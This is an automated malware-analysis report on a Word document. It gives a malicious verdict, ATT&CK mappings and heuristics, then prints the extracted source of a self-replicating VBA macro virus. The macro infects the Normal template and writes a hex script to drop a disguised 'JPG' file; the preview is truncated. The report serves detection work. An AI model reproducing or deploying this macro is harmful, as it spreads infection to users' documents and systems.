Verdict: MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
T1105 Ingress Tool Transfer
The sample contains a critical VBA macro that executes a Shell() command, indicating malicious intent. The macro attempts to write to a temporary file and then save a file disguised as a JPG, likely to download and execute a second-stage payload. The presence of legacy WordBasic markers and the Document_Open macro further support its malicious nature.
Heuristics (6)
- VBA macros detected [medium] (OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro [high] (OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low] (OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 108310 bytes | cc034bb785ef7c374d10abf442770567760d34429aadf023d6093ec4709f3a68 |
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
'Pothead
'(c) by Necronomikon/ZeroGravity
End Sub
Private Sub Document_Close()
On Error Resume Next
On Error Resume Next: Randomize
Dim nec1 As Object, nec2 As Object, nec3 As Object, nec4 As Object, nec5 As Object
Dim thc As Object, lsd As Object, dope As Object, weed As Object, coke As Object
Set nec1 = ActiveDocument: Set nec2 = nec1.VBProject: Set nec3 = nec2.VBComponents: Set nec4 = nec3.Item(1): Set nec5 = nec4.CodeModule
Set thc = NormalTemplate: Set lsd = thc.VBProject: Set dope = lsd.VBComponents: Set weed = dope.Item(1): Set coke = weed.CodeModule
pshq = coke.countoflines: zero = nec5.countoflines: gravity = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)
If pshq < zero Then
For sysnec = 1 To pshq: NT5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To zero: peace = nec5.lines(sysnec, 1): coke.insertlines sysnec, peace: Next sysnec
NormalTemplate.Save: End If
If zero < pshq Then
For sysnec = 1 To zero: nec5.replaceline sysnec, gravity: Next sysnec
For sysnec = 1 To pshq: peace = coke.lines(sysnec, 1): nec5.insertlines sysnec, peace: Next sysnec
ActiveDocument.Save: End If
End Sub
Sub FileSaveAs()
On Error Resume Next
Open Environ("WINDIR") & "\pothead.tmp" For Output As #1
Print #1, "n " & Environ("WINDIR") & "\POTHEAD.JPG"
Print #1, "e 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01"
Print #1, "e 0110 00 01 00 00 FF DB 00 43 00 06 04 05 06 05 04 06"
Print #1, "e 0120 06 05 06 07 07 06 08 0A 10 0A 0A 09 09 0A 14 0E"
Print #1, "e 0130 0F 0C 10 17 14 18 18 17 14 16 16 1A 1D 25 1F 1A"
Print #1, "e 0140 1B 23 1C 16 16 20 2C 20 23 26 27 29 2A 29 19 1F"
Print #1, "e 0150 2D 30 2D 28 30 25 28 29 28 FF DB 00 43 01 07 07"
Print #1, "e 0160 07 0A 08 0A 13 0A 0A 13 28 1A 16 1A 28 28 28 28"
Print #1, "e 0170 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0180 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28"
Print #1, "e 0190 28 28 28 28 28 28 28 28 28 28 28 28 28 28 FF C2"
Print #1, "e 01A0 00 11 08 00 BD 02 37 03 01 22 00 02 11 01 03 11"
Print #1, "e 01B0 01 FF C4 00 1B 00 00 01 05 01 01 00 00 00 00 00"
Print #1, "e 01C0 00 00 00 00 00 00 05 01 02 03 04 06 00 07 FF C4"
Print #1, "e 01D0 00 19 01 00 03 01 01 01 00 00 00 00 00 00 00 00"
Print #1, "e 01E0 00 00 00 00 01 02 03 04 05 FF DA 00 0C 03 01 00"
Print #1, "e 01F0 02 10 03 10 00 00 01 2F 14 10 73 55 D1 D7 03 0E"
Print #1, "e 0200 F8 18 E9 53 96 47 2B A5 14 F3 02 0C ED 05 54 09"
Print #1, "e 0210 36 26 AD 4F A1 CD 95 39 0E CA 55 B0 9F 23 78 68"
Print #1, "e 0220 07 55 95 1D 8B D9 87 39 D0 A6 79 5C E8 9B 9D E1"
Print #1, "e 0230 1D 68 26 0C F2 E7 91 AD 0B B3 BC 07 98 09 8C 3D"
Print #1, "e 0240 10 56 81 89 00 A2 34 F5 46 56 03 8A 0D 40 F3 81"
Print #1, "e 0250 BC 0E 3C 0A 81 A7 04 7A 66 D0 3A 81 87 86 40 37"
Print #1, "e 0260 38 0B 20 42 C8 5A ED 69 22 CA 35 AD 4F 65 A5 0D"
Print #1, "e 0270 2D 8C 7C 21 B7 6E 76 EC D1 49 29 5C 40 85 AD 61"
Print #1, "e 0280 95 FA 3E A0 1A A4 FA E7 65 91 43 9E 8E E6 4E 0F"
Print #1, "e 0290 BC 35 EA 8B 70 DB 49 E8 68 02 95 33 D5 9B 24 B7"
Print #1, "e 02A0 8A 3F 94 6A FC 63 99 79 EF CB F9 8E A6 59 DC B9"
Print #1, "e 02B0 80 CA F3 4C 7B 36 C5 39 79 CA 73 95 0C 5B 37 95"
Print #1, "e 02C0 08 53 D6 A6 F3 6B AB 7A 78 D6 6B C7 39 03 C4 2B"
Print #1, "e 02D0 54 D7 E9 79 A7 D7 B9 58 19 CF 70 44 B3 28 40 93"
Print #1, "e 02E0 B4 22 59 38 51 A4 8D 04 E5 70 4B 1F 34 72 46 D9"
Print #1, "e 02F0 44 BD 25 E5 43 64 B3 18 25 53 A3 C2 27 C1 05 2B"
Print #1, "e 0300 66 03 D4 41 82 79 6D 94 50 3E 8F 86 3A CE 96 89"
Print #1, "e 0310 59 FE 27 68 06 5B F5 EA B9 D7 8D B7 6F 55 D6 7C"
Print #1, "e 0320 9D 49 96 8D D1 0F 9E 2E 02 90 F2 5A 8C 79 01 84"
Print #1, "e 0330
... (truncated)